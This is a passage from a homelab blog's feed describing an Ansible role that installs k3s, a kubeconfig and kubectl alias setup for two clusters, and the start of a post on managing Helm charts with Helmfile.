</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Download artifact only if needed</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">not ansible_check_mode and ( k3s_version_output.rc != 0 or installed_k3s_version is version(k3s_version, &#39;&lt;&#39;) )</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">block</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Download K3s install script</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ansible.builtin.get_url</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">url</span>: <span style="color:#ae81ff">https://get.k3s.io/</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">timeout</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/usr/local/bin/k3s-install.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0755&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Download K3s binary</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ansible.builtin.command</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cmd</span>: <span style="color:#ae81ff">/usr/local/bin/k3s-install.sh</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">INSTALL_K3S_SKIP_START</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">INSTALL_K3S_VERSION</span>: <span style="color:#e6db74">&#34;{{ k3s_version }}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">changed_when</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Make config directory</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.file</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/etc/rancher/k3s&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0755&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Copy config file</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#e6db74">&#34;k3s-config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#e6db74">&#34;/etc/rancher/k3s/config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0644&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">_server_config_result</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Make data directory</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.file</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;{{ data_dir }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0755&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Make volume directory</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.file</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;{{ volume_dir }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0755&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Copy K3s service file</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#e6db74">&#34;k3s.service&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#e6db74">&#34;/etc/systemd/system/k3s.service&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0644&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">service_file_single</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Restart K3s service</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ansible_facts.services[&#39;k3s.service&#39;] is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ansible_facts.services[&#39;k3s.service&#39;].state == &#39;running&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">service_file_single.changed or _server_config_result.changed</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">k3s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">daemon_reload</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">restarted</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Enable and check K3s service</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts.services[&#39;k3s.service&#39;] is not defined or ansible_facts.services[&#39;k3s.service&#39;].state != &#39;running&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">k3s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">daemon_reload</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>The nice thing about this role is that it can handle updates reasonably well.
It still feels a bit weird to use a bash script as part of the process, but it
looks like that&rsquo;s really the intended approach for deploying k3s. Worth noting
here is the very first task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Populate service facts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.service_facts</span>:
</span></span></code></pre></div><p>Without this, at least in my setup, later tasks using <code>ansible_facts.services</code>
checks do not work, as Ansible does not gather service data by default.</p>
<p>The role also needs some variables defined, which I do in <code>defaults/main.yml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">k3s_version</span>: <span style="color:#ae81ff">v1.33.1+k3s1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data_dir</span>: <span style="color:#e6db74">&#34;/srv/k3s/state&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">volume_dir</span>: <span style="color:#e6db74">&#34;/srv/k3s/volumes&#34;</span>
</span></span></code></pre></div><p>The <code>k3s.service</code> file is also taken from the role:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-systemd" data-lang="systemd"><span style="display:flex;"><span><span style="color:#66d9ef">[Unit]</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Description</span><span style="color:#f92672">=</span><span style="color:#e6db74">Lightweight Kubernetes</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Documentation</span><span style="color:#f92672">=</span><span style="color:#e6db74">https://k3s.io</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Wants</span><span style="color:#f92672">=</span><span style="color:#e6db74">network-online.target</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">After</span><span style="color:#f92672">=</span><span style="color:#e6db74">network-online.target</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">[Install]</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">WantedBy</span><span style="color:#f92672">=</span><span style="color:#e6db74">multi-user.target</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">[Service]</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Type</span><span style="color:#f92672">=</span><span style="color:#e6db74">notify</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">EnvironmentFile</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/etc/default/%N</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">EnvironmentFile</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/etc/sysconfig/%N</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">EnvironmentFile</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/etc/systemd/system/k3s.service.env</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">KillMode</span><span style="color:#f92672">=</span><span style="color:#e6db74">process</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Delegate</span><span style="color:#f92672">=</span><span style="color:#e6db74">yes</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Having non-zero Limit*s causes performance problems due to accounting overhead</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># in the kernel. We recommend using cgroups to do container-local accounting.</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">LimitNOFILE</span><span style="color:#f92672">=</span><span style="color:#e6db74">1048576</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">LimitNPROC</span><span style="color:#f92672">=</span><span style="color:#e6db74">infinity</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">LimitCORE</span><span style="color:#f92672">=</span><span style="color:#e6db74">infinity</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">TasksMax</span><span style="color:#f92672">=</span><span style="color:#e6db74">infinity</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">TimeoutStartSec</span><span style="color:#f92672">=</span><span style="color:#e6db74">0</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Restart</span><span style="color:#f92672">=</span><span style="color:#e6db74">always</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">RestartSec</span><span style="color:#f92672">=</span><span style="color:#e6db74">5s</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ExecStartPre</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/sbin/modprobe br_netfilter</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ExecStartPre</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/sbin/modprobe overlay</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ExecStart</span><span style="color:#f92672">=</span><span style="color:#e6db74">/usr/local/bin/k3s server</span>
</span></span></code></pre></div><p>And then finally, there&rsquo;s the k3s config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">tls-san</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;k3s.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;192.0.2.100&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data-dir</span>: <span style="color:#e6db74">&#34;{{ data_dir }}&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">cluster-cidr</span>: <span style="color:#e6db74">&#34;10.42.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">service-cidr</span>: <span style="color:#e6db74">&#34;10.43.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">flannel-backend</span>: <span style="color:#e6db74">&#34;wireguard-native&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">default-local-storage-path</span>: <span style="color:#e6db74">&#34;{{ volume_dir }}&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">disable</span>: <span style="color:#e6db74">&#34;servicelb&#34;</span>
</span></span></code></pre></div><p>Nothing too special here either. I decided to keep k3s&rsquo; default <a href="https://github.com/rancher/local-path-provisioner/tree/master">local-storage provider</a>.
The reason being that I need this cluster to be as independent of any other
services as possible, because it&rsquo;s going to be the place where I deploy everything
that&rsquo;s serving as the bedrock for the rest of the Homelab.</p>
<p>Besides that, the last notable action is disabling the <code>servivelb</code> load balancer
service. In short, this is k3s&rsquo; implementation of a simple handler for LoadBalancer
type k8s Services. I couldn&rsquo;t use it because DHCP packets never made
it to the Tinkerbell Pod. I will go into more detail about this in the next
post of the series.</p>
<p>And after an <code>ansible-playbook deployment.yml --limit master</code>, I had a fully
functional k3s cluster. It started up without any issue, deployed Traefik and
was ready for more workloads. I like how little hassle this was, and I find myself
agreeing with k3s&rsquo; claims of being a simple k3s distribution. As far as such
things can be simple. &#x1f60f;</p>
<h2 id="cluster-connection-setups">Cluster connection setups</h2>
<p>Before I finish this post, I would like to talk a little bit about how I
configured access to the new k3s cluster, as it would be accessed from the same host
as my main cluster. I ended up going with the alias route, using kubectl&rsquo;s
<code>--context</code> parameter.</p>
<p>Let&rsquo;s first have a look at the updated <code>~/.kube/config</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">clusters</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certificate-authority-data</span>: <span style="color:#ae81ff">&lt;BASE64 encoded data here&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#ae81ff">https://k8s.example.com:6443</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">main-cluster</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#ae81ff">https://k3s.example.com:6443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certificate-authority-data</span>: <span style="color:#ae81ff">&lt;Different BASE64 encoded data here&gt;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">management-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">contexts</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">context</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cluster</span>: <span style="color:#ae81ff">main-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">user</span>: <span style="color:#ae81ff">main-admin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">main-admin@main-cluster</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">context</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cluster</span>: <span style="color:#ae81ff">management-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">user</span>: <span style="color:#ae81ff">mgm-admin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mgm-admin@management-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">current-context</span>: <span style="color:#ae81ff">main-admin@main-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">preferences</span>: {}
</span></span><span style="display:flex;"><span><span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">main-admin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">client.authentication.k8s.io/v1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">pass</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">show</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">main-creds</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">interactiveMode</span>: <span style="color:#ae81ff">IfAvailable</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mgm-admin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">client.authentication.k8s.io/v1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">pass</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">show</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">mgm-creds</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">interactiveMode</span>: <span style="color:#ae81ff">IfAvailable</span>
</span></span></code></pre></div><p>For more details on this config, and why <a href="https://www.passwordstore.org/">pass</a>
appears in it, have a look at <a href="https://blog.mei-home.net/posts/securing-k8s-credentials/">this post</a>.
Each cluster gets its own context definition, and each cluster has a different user.</p>
<p>The aliases for kubectl then look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>alias k<span style="color:#f92672">=</span>kubectl<span style="color:#ae81ff">\ </span>--context<span style="color:#f92672">=</span>main-admin@main-cluster
</span></span><span style="display:flex;"><span>alias k-master<span style="color:#f92672">=</span>kubectl<span style="color:#ae81ff">\ </span>--context<span style="color:#f92672">=</span>mgm-admin@management-cluster
</span></span></code></pre></div><p>So with <code>k</code>, I&rsquo;m getting my main cluster. I decided to keep the alias I had
originally created for the cluster, instead of renaming it to e.g. <code>k-main</code>. I&rsquo;ve
started to question this decision and would propose for anyone looking to replicate
my setup to not re-use an old setup like this, as inevitably, you will be using
the main cluster&rsquo;s alias even though you meant to talk to the management cluster.</p>
<p>Using <code>k</code> when wanting to do something with the k8s cluster has become pretty
ingrained over the last year+.</p>
<p>One random comment for when you&rsquo;re using a similar setup with autocompletion:
Don&rsquo;t surround the alias definition with quotation marks, e.g. like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>alias k<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;kubectl --context=main-admin@main-cluster&#34;</span>
</span></span></code></pre></div><p>The alias itself will work, but autocomplete won&rsquo;t. That&rsquo;s why I&rsquo;m using the <code>\ </code>
syntax instead. Apropos autocomplete, you need to explicitly tell bash to
autocomplete on aliases. For example like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>source ~/.kube/kubectl-comp
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#66d9ef">$(</span>type -t compopt<span style="color:#66d9ef">)</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;builtin&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    complete -o default -F __start_kubectl k kmaster
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    complete -o default -o nospace -F __start_kubectl k kmaster
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span></code></pre></div><p>The <code>__start_kubectl</code> function is defined in the autocomplete script provided
by kubectl when running <code>kubectl completion bash</code>.</p>
<p>Finally, I wrote about how I&rsquo;m using Helmfile to manage the deployments on my
Kubernetes cluster in the <a href="https://blog.mei-home.net/posts/helmfile/">last post</a>.
Luckily, Helmfile already has an option to set the context right in the Helmfile:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">helmDefaults</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeContext</span>: <span style="color:#ae81ff">main-admin@main-cluster</span>
</span></span></code></pre></div><p>This removes any danger of deploying to the wrong cluster, although commands
like <code>destroy</code> might still be dangerous when I&rsquo;ve got entries with the same names
in both files. &#x1f62c;</p>
<h2 id="finale">Finale</h2>
<p>And that completes this part of the setup. The next one will be about the setup
of Tinkerbell itself, and I will likely combine it with the provisioning of the
first VM with Tinkerbell.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Organizing Helm charts and other Manifests with Helmfile</title>
      <link>https://blog.mei-home.net/posts/helmfile/</link>
      <pubDate>Thu, 05 Jun 2025 21:20:53 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/helmfile/</guid>
      <description>How to organize and handle it all?</description>
      <content:encoded><![CDATA[<p>Wherein I describe how I organize Helm charts and other k8s manifests.</p>
<p>I&rsquo;ve had this post laying around in my draft folder for a long long time.
Mostly because I started writing it before I realized how useful it is to write
posts very close to when something happens.</p>
<p>The &ldquo;something happens&rdquo; in this case is the answer to the question &ldquo;How to
organize my Helm charts and other k8s manifests?&rdquo;. I liked Helm fine enough when
I looked at it. It&rsquo;s pretty nice to get all necessary manifests to run an app,
instead of having to write all of them myself.
But the question then was: How to store which exact Helm charts I have
installed, and in which version? And how/where to store the <code>values.yaml</code> files?
And then, what about random manifests, like additional PriorityClasses?</p>
<p>The solution that was pointed out to me on the Fediverse: <a href="https://github.com/helmfile/helmfile">Helmfile</a>.
It&rsquo;s a piece of software that allows reading a number of Helm charts to be
installed and deploying them onto a cluster. It does not re-implement Helm, but
simply calls a previously installed Helm binary.</p>
<p>All of the configuration for Helmfile is stored in a local Yaml file. A
good example for what that config looks like is my <a href="https://cloudnative-pg.io/">CloudNativePG</a>
setup. Helmfile by default reads the config from a file named <code>helmfile.yaml</code>
in the current working dir. My <code>helmfile.yaml</code>, stripped down only to the
CNPG setup, looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">repositories</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cloud-native-pg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">url</span>: <span style="color:#ae81ff">https://cloudnative-pg.github.io/charts</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">releases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cnpg-operator</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">cloud-native-pg/cloudnative-pg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">v0.21.2</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">cnpg-operator</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./cnpg-operator/hl-values.yaml.gotmpl</span>
</span></span></code></pre></div><p>And the <code>hl-vaues.yaml.gotmpl</code> is then just the <code>values.yaml</code> file for the
CNPG Helm chart. With one additional wrinkle: Helmfile can do templating, on the
<code>values.yaml</code> file. Which is pretty cool. Just one example of how I&rsquo;m using this
is my <a href="https://external-secrets.io/latest/">external-secrets</a> addon <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">caBundle</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  {{- exec &#34;curl&#34; (list &#34;https://vault.example.com:8200/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span></code></pre></div><p>Then in turn, I&rsquo;m writing that to a Secret:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-ca-cert</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">stringData</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caCert</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {{- .Values.caBundle | nindent 6 }}</span>
</span></span></code></pre></div><p>And the curl command is executed on the machine where Helmfile is executed. Which
is particularly nice when you&rsquo;re fetching some Secrets via this mechanism, because
it allows you to use local credentials that only exist on that single machine.</p>
<p>Once you&rsquo;ve entered a release into the Helmfile, it can be deployed with a
command like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>helmfile apply --selector name<span style="color:#f92672">=</span>cnpg-operator
</span></span></code></pre></div><p>This will automatically update all repositories and then run <code>helm upgrade</code>.
Very helpfully, it will also output the diff between the new release and what&rsquo;s
currently deployed on the cluster.</p>
<p>Besides working with Helm charts directly, you can also just throw a couple of
manifests into a directory and deploy it the same way. I&rsquo;m doing this for my
own priority classes for example. I just have them in a directory <code>hl-common/</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ls hl-common/
</span></span><span style="display:flex;"><span>prio-hl-critical.yaml  prio-hl-external.yaml
</span></span></code></pre></div><p>Helmfile will then use <a href="https://github.com/helmfile/chartify">Chartify</a> to
turn those loose files into an ad-hoc chart and deploy it.</p>
<p>The <code>release[].values[]</code> list is also a pretty useful feature. It allows setting
Helm chart values right in the Helmfile instead of a separate <code>values.yaml</code>.
I don&rsquo;t use this too much, as I like having all configs neatly in one file. But
